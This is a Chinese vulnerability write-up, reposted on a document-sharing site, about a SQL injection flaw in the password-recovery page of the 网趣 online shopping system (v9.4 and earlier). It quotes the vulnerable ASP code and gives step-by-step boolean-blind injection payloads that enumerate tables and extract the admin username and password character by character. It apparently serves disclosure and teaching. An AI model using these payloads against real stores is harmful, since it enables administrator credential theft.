首页 > 教育资源 > 资料大全>

网趣网上购物系统SQL注入漏洞浅析脚本安全 -电脑资料

网趣网上购物系统SQL注入漏洞浅析脚本安全 -电脑资料

时间:2016-01-03 09:12:26
染雾
分享 WORD下载 PDF下载 投诉

推荐文章

的中秋节是几号
热度:
 小型微利企业税收优惠政策及操作指南
热度:
 飞信Fetion跨网络语音聊天功能使用指南 -电脑资料
热度:
 小学班级口号
热度:
 一帮一结对子帮扶计划1
热度:

author: cnryan @http://hi.baidu.com/cnryan

网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌,

网趣网上购物系统SQL注入漏洞浅析脚本安全

这是官方的话 ↑

这个sql injection出现在找回密码处,最新版本的9.4也存在漏洞,随后对v9.0等以下版本测试均存在漏洞。

漏洞页面:getpwd2.asp

漏洞代码:

<%

username=request.form("username")

set rs=Server.CreateObject("Adodb.Recordset")

sql="select * from [user] where username='"&username&"' "

rs.open sql,conn,1,1

If rs.eof Then

%>

典型的注入,和以前的网软购物系统一个模样

http://127.0.0.1/cnhww9.4/getpwd.asp

getpwd.asp是找回密码的页面,输入的用户名交给getpwd2.asp处理,若存在用户名到达第二步,否则退出

输入 test' and 1=1 and ''='

跳到getpwd2.asp 第二步

输入 test' and 1=2 and ''='

提示没有这个用户

猜表 ->cnhww

test' and exists (select * from [admin]) and '1'='1F

test' and exists (select * from [cnhww]) and '1'='1T

字段 ->admin password

test' and exists (select admin from [cnhww]) and '1'='1T

test' and exists (select password from [cnhww]) and '1'='1T

值 -->

test' and (select top 1 asc(mid(admin,1,1)) fro

m cnhww)>97 and '1'='1F

test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1T

97=a

test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>100 and '1'='1F

test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>99 and '1'='1T

100=d

……

test' and (select top 1 asc(mid(password,1,1)) from cnhww)>55 and '1'='1

……

……

网趣网上购物系统SQL注入漏洞浅析脚本安全 -电脑资料

将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档文档为doc格式

相关推荐

复制全文
WORD
PDF
下载本文

点击推荐

Copyright © 2019 ~ 2022 hxlib.cn 古诗文网 版权所有

向你推荐的相关文章

相关文章列表

下载文档
网趣网上购物系统SQL注入漏洞浅析脚本安全 -电脑资料

手机扫码分享

Top